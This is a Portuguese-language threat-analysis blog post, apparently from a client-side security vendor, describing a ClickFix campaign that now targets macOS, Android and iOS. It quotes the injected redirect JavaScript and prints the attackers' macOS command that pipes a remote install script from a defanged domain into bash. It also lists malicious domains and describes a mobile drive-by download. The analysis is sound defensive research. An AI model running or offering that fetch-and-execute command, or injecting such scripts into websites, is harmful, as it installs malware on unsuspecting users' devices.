O que começou como um truque de engenharia social focado no Windows se transformou em uma ameaça multiplataforma do lado do cliente. Neste artigo, detalhamos uma variante recente do ClickFix que agora é direcionada para macOS, Android e iOS, usando redirecionamentos baseados em navegador, prompts de interface de usuário falsos e até mesmo técnicas de download drive-by.
O que é um ataque ClickFix?
Os ataques ClickFix não são novos. Meu primeiro encontro com um foi em Setembro de 2024:
Um ataque ClickFix é uma forma de engenharia social direcionada ou ataque do lado do cliente que explora o instinto do usuário de “apenas corrigir o problema”. Normalmente começa com uma mensagem convincente que aponta para um suposto problema (como uma vulnerabilidade de segurança ou problema de repositório). O usuário é incentivado a clicar em um link ou executar um comando, acreditando que está resolvendo algo importante.
Neste exemplo de ataque, o usuário é solicitado a executar um script no terminal. No Windows, isso significava PowerShell. Naturalmente, a mesma técnica também funciona no macOS e no Linux. E, assim como aconteceu com o Windows, presumi que os usuários não cairiam nessa.
No entanto, as suposições são um jogo perigoso na segurança cibernética, o que infelizmente foi comprovado mais uma vez.
Somos cside e monitoramos ataques de script de terceiros do lado do cliente e aprimoramos a proteção do lado do cliente em tempo real para sites e seus usuários. Somente nos últimos três meses, observamos mais de 300 mil sites comprometidos.
Curiosamente, esta é a segunda vez que damos notícias de invasores evoluindo seus TTPs (Táticas, Técnicas e Procedimentos).
Mas o que antes era uma ameaça exclusiva do Windows, agora também tem como alvo outros sistemas operacionais.
O ataque em detalhes
Recebemos um alerta para JavaScript baixado de:
hxxps://idjhvn4m[.]pro?h=7bd350a4ed55a8faf2e45301d70d2&user=16O script entregue:
(function () { var sitename = document.querySelector("meta[property='og:url']").getAttribute("content"); const mysite = new URL(sitename);const mysitename = `${mysite.protocol}//${mysite.hostname}`;var mytitle = document.querySelector("meta[property='og:title']").getAttribute("content"); var xtitle_spe = mytitle.replace(/[&\/\\#, +()$~%.'":*?<>{}]/g, '-'); var xtitle_spa = xtitle_spe.replace(/\s+/g, '-'); var oldurl = 'https://kbmljxm.com/?s={KEYWORD}&p=16'; var final_url_1 = oldurl.replace('{KEYWORD}', xtitle_spa);var final_url_2 = final_url_1.replace('{site}', mysitename); var id = 16; var successResponse = final_url_2; var elements = document.getElementsByClassName("buttonPress-"+16); for(var i = 0; i < elements.length; i++) {var anchor = elements[i];anchor.onclick = function() {window.open(successResponse, '_blank');}} })();
Este JavaScript não é altamente ofuscado, o que é incomum nesses tipos de ataques. Ele cria um manipulador de cliques para elementos com um nome de classe específico que abre uma URL em uma nova guia quando clicado. Aqui está o que ele faz:
- Pega um URL de modelo (hxxps://kbmljxm[.]com/?s={KEYWORD}&p=16)
- Substitui {KEYWORD} pelo título da página processada
- Anexa manipuladores de clique a todos os elementos com a classe buttonPress-16
- Quando clicados, esses elementos abrem a URL construída em uma nova aba
Abaixo está a cadeia de redirecionamento:
Cadeia de redirecionamento na IU
A página aparece como um encurtador de URL e pede ao usuário para copiar um link. Os invasores estão abusando do cutt[.]ly, um encurtador de URL legítimo.
Quando um usuário cola o URL abreviado no navegador, ele o redireciona para:
Esta página imitada do encurtador de URL traz o seguinte pop-up:
“Cole o link que você copiou na linha de endereço do navegador.”
Em seguida, ele redireciona o usuário para uma página de download (neste caso, para macOS):
/bin/bash -c "$(curl -fsSL hxxps://vuwzer[.]com/get/install.sh)"
O conteúdo deste arquivo shell é o seguinte nesta captura de tela:
Este script de shell baixa um executável macOS (detectado por 10 mecanismos antivírus em VirusTotal).
Comportamento Android e iOS
Quando testamos isso no Android e iOS, esperávamos uma variante ClickFix. Mas em vez disso, encontramos um ataque drive-by.
Um ataque drive-by é um tipo de ataque cibernético em que um código malicioso é executado ou baixado em um dispositivo simplesmente visitando uma página da Web comprometida ou maliciosa. Não são necessários cliques, instalações ou interação.
A página agora nos redirecionou para:
hxxps://iteslawow[.]com/?=ijn&diu=16&sid=npT
Este site baixou um arquivo .tar - 7zip protegido por senha - que extraiu e descartou o malware (detectado por 5 mecanismos AV). E detectado por 5 fornecedores no VirusTotal.
Detectado por 5 fornecedores em VirusTotal.
Tanto no sistema operacional Android quanto no Windows, esse estilo de ataque drive-by foi usado.
Este é um ataque fascinante e em evolução que demonstra como os invasores estão expandindo seu alcance. O que começou como uma campanha ClickFix específica para Windows agora tem como alvo macOS, Android e iOS. Ampliando significativamente a escala da operação.
É mais um lembrete de como os ataques do lado do cliente estão se espalhando amplamente e das várias formas que podem assumir, tudo isso explorando a confiança que os usuários depositam nas interações do navegador quando a segurança do lado do cliente está faltando ou é mal aplicada.
